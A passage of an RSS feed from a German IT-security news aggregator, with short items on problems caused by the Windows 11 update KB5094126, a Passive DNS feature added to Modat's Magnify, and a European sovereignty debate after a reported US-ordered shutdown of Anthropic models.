<title><![CDATA[Windows 11 Update Causes System Freezes, Triggers BitLocker Recovery, and Breaks OneDrive]]></title>
<description><![CDATA[Windows 11 cumulative update KB5094126, released on June 9, 2026, for builds 26200.8655 and 26100.8655, is triggering a wave of user reports about system freezes, forced BitLocker recovery screens, and broken OneDrive integration in File Explorer on some devices. While…
Read more →
The post Windo...]]></description>
<link>https://tsecurity.de/de/3599141/it-security-nachrichten/windows-11-update-causes-system-freezes-triggers-bitlocker-recovery-and-breaks-onedrive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599141/it-security-nachrichten/windows-11-update-causes-system-freezes-triggers-bitlocker-recovery-and-breaks-onedrive/</guid>
<pubDate>Mon, 15 Jun 2026 14:53:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11 cumulative update KB5094126, released on June 9, 2026, for builds 26200.8655 and 26100.8655, is triggering a wave of user reports about system freezes, forced BitLocker recovery screens, and broken OneDrive integration in File Explorer on some devices. While…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/windows-11-update-causes-system-freezes-triggers-bitlocker-recovery-and-breaks-onedrive/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/windows-11-update-causes-system-freezes-triggers-bitlocker-recovery-and-breaks-onedrive/">Windows 11 Update Causes System Freezes, Triggers BitLocker Recovery, and Breaks OneDrive</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Update Causes System Freezes, Triggers BitLocker Recovery, and Breaks OneDrive]]></title>
<description><![CDATA[Windows 11 cumulative update KB5094126, released on June 9, 2026, for builds 26200.8655 and 26100.8655, is triggering a wave of user reports about system freezes, forced BitLocker recovery screens, and broken OneDrive integration in File Explorer on some devices. While Microsoft positions the pat...]]></description>
<link>https://tsecurity.de/de/3599011/it-security-nachrichten/windows-11-update-causes-system-freezes-triggers-bitlocker-recovery-and-breaks-onedrive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599011/it-security-nachrichten/windows-11-update-causes-system-freezes-triggers-bitlocker-recovery-and-breaks-onedrive/</guid>
<pubDate>Mon, 15 Jun 2026 14:06:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11 cumulative update KB5094126, released on June 9, 2026, for builds 26200.8655 and 26100.8655, is triggering a wave of user reports about system freezes, forced BitLocker recovery screens, and broken OneDrive integration in File Explorer on some devices. While Microsoft positions the patch as a critical security and reliability update, early feedback suggests serious […]</p>
<p>The post <a href="https://gbhackers.com/windows-11-update-causes-system-freezes/">Windows 11 Update Causes System Freezes, Triggers BitLocker Recovery, and Breaks OneDrive</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Modat enhances Magnify with Passive DNS for faster threat hunting and infrastructure analysis]]></title>
<description><![CDATA[Modat has launched native Passive DNS intelligence in Magnify, its internet intelligence platform, unifying IP, device fingerprint, certificate, and passive DNS into a single pivot-driven investigation flow. Threat intelligence, threat hunting, exposure management, fraud and Security teams have l...]]></description>
<link>https://tsecurity.de/de/3598814/it-security-nachrichten/modat-enhances-magnify-with-passive-dns-for-faster-threat-hunting-and-infrastructure-analysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598814/it-security-nachrichten/modat-enhances-magnify-with-passive-dns-for-faster-threat-hunting-and-infrastructure-analysis/</guid>
<pubDate>Mon, 15 Jun 2026 12:50:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Modat has launched native Passive DNS intelligence in Magnify, its internet intelligence platform, unifying IP, device fingerprint, certificate, and passive DNS into a single pivot-driven investigation flow. Threat intelligence, threat hunting, exposure management, fraud and Security teams have long been forced to stitch together evidence across multiple tools and datapoints. Magnify eliminates that gap, building on its clustering-based device fingerprinting and geo-native scanning to surface infrastructure that conventional internet scanners miss. Most internet intelligence platforms … <a href="https://www.helpnetsecurity.com/2026/06/15/modat-enhances-magnify-with-passive-dns-for-faster-threat-hunting-and-infrastructure-analysis/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/15/modat-enhances-magnify-with-passive-dns-for-faster-threat-hunting-and-infrastructure-analysis/">Modat enhances Magnify with Passive DNS for faster threat hunting and infrastructure analysis</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Update KB5094126 Freezes Systems, Forces BitLocker Recovery, and More]]></title>
<description><![CDATA[Microsoft’s June 2026 Patch Tuesday cumulative update for Windows 11, KB5094126 (OS Builds 26200.8655 and 26100.8655), has triggered a wave of reports across community forums and enterprise environments, with users experiencing system freezes, forced BitLocker recovery loops, broken OneDrive Expl...]]></description>
<link>https://tsecurity.de/de/3598796/it-security-nachrichten/windows-11-update-kb5094126-freezes-systems-forces-bitlocker-recovery-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598796/it-security-nachrichten/windows-11-update-kb5094126-freezes-systems-forces-bitlocker-recovery-and-more/</guid>
<pubDate>Mon, 15 Jun 2026 12:38:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft’s June 2026 Patch Tuesday cumulative update for Windows 11, KB5094126 (OS Builds 26200.8655 and 26100.8655), has triggered a wave of reports across community forums and enterprise environments, with users experiencing system freezes, forced BitLocker recovery loops, broken OneDrive Explorer…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/windows-11-update-kb5094126-freezes-systems-forces-bitlocker-recovery-and-more/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/windows-11-update-kb5094126-freezes-systems-forces-bitlocker-recovery-and-more/">Windows 11 Update KB5094126 Freezes Systems, Forces BitLocker Recovery, and More</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic shutdown sparks sovereignty debate across Europe]]></title>
<description><![CDATA[The European Commission is assessing the implications of the US order that forced Anthropic to shut down Fable 5 and Mythos 5 worldwide. European researchers are debating the right response: building their own foundation models or securing access through contracts. But building out homegrown infr...]]></description>
<link>https://tsecurity.de/de/3598791/ai-nachrichten/anthropic-shutdown-sparks-sovereignty-debate-across-europe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598791/ai-nachrichten/anthropic-shutdown-sparks-sovereignty-debate-across-europe/</guid>
<pubDate>Mon, 15 Jun 2026 12:33:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1088" height="608" src="https://the-decoder.com/wp-content/uploads/2026/06/fable_5_us_prison.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        The European Commission is assessing the implications of the US order that forced Anthropic to shut down Fable 5 and Mythos 5 worldwide. European researchers are debating the right response: building their own foundation models or securing access through contracts. But building out homegrown infrastructure would require computing capacity, energy, and competitive providers that Europe currently lacks, experts warn.</p>
<p>The article <a href="https://the-decoder.com/anthropic-shutdown-sparks-sovereignty-debate-across-europe/">Anthropic shutdown sparks sovereignty debate across Europe</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,16ms -->